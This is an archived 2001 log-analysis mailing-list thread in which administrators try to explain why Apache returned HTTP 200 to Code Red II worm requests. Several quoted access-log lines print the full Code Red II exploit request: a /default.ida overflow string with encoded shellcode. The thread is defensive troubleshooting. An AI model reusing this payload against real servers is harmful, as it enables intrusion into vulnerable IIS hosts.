What is the question: are you wondering why any UNIX box would actually have a default.ida? Well, there are a number of packages that implement Windows functions for UNIX, for example, Sun Microsystems now own Chili!Soft ASP, which is M$ ASP for UNIX. I belive the are similar packages for things besides ASP too. Is it possible that the servers in question have something like that installed? Apache FrontPage extensions maybe? Also, I recall some people discussing writing a dummy script that actually did something useful, like email the administrator of the client's netblock, or something, reporting the hit. At 03:57 PM 9/12/2001 -0500, you wrote: >Yes, I have four of them (very odd...) > >root@www:/var/log/apache# grep "default.ida" usb-access.log | grep >"HTTP/1.0\" 200" >192.192.135.153 - - [05/Aug/2001:22:13:19 -0500] "GET >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a >HTTP/1.0" 200 - >211.41.178.2 - - [20/Aug/2001:05:06:41 -0500] "GET >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a >HTTP/1.0" 200 - >200.48.188.155 - - [22/Aug/2001:16:36:36 -0500] "GET >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a >HTTP/1.0" 200 - >195.117.169.40 - - [04/Sep/2001:03:51:49 -0500] "GET >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a >HTTP/1.0" 200 - >root@www:/var/log/apache# > > >Sweth Chandramouli wrote: >> >> This probably isn't appropriate for this list, or at >> least is more appropriate for other lists, but I'm tired (and about to >> go to sleep now that I've finally confirmed that none of my friends have >> been blown up or crushed by falling buildings) and figured the folks here >> might be likely to have seen this if anyone has. So, has anyone seen an >> Apache server return a 200 rather than 404 (according to Apache's logs) >> in response to an attempted Code Red II exploit? I've seen a single >> occurance of it to date, on a Solaris machine that quite regularly gets >> such attempts; all of the log entries for those other attempts (both >> before and since) had the proper 404 response code, but this particular >> one doesn't: >> >> ct740592-a.westprt1.ky.home.com - - [11/Sep/2001:12:21:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 - "-" "-" >> >> . I've only tracked down one other example of this >> mentioned on the web, at >> <http://www.geocrawler.com/lists/3/Debian-Linux/199/25/6335051/>; Ian, >> who reported that incident, never figured out what caused it, either. >> >> Could anyone who has seen this (or has a good idea of what >> it is) email me off-list? >> >> Thanks, >> >> Sweth. >> >> -- >> Sweth Chandramouli ; <svcat_private> >> President, Idiopathic Systems Consulting >> >> ------------------------------------------------------------------------ >> Part 1.2Type: application/pgp-signature > >-- >djenkinsat_private Universal Savings Bank. >Security Administrator, Unix Administrator, Alpha Geek > >The three most dangerous things are a programmer with a soldering >iron, a manager who codes, and a user who gets ideas. > >--------------------------------------------------------------------- >To unsubscribe, e-mail: loganalysis-unsubscribeat_private >For additional commands, e-mail: loganalysis-helpat_private ---------------------------------------------------- Jonathan Wilson System Administrator Cedar Creek Software http://www.cedarcreeksoftware.com Central Texas IT http://www.centraltexasit.com --------------------------------------------------------------------- To unsubscribe, e-mail: loganalysis-unsubscribeat_private For additional commands, e-mail: loganalysis-helpat_private
This archive was generated by hypermail 2b30 : Wed Sep 12 2001 - 15:34:30 PDT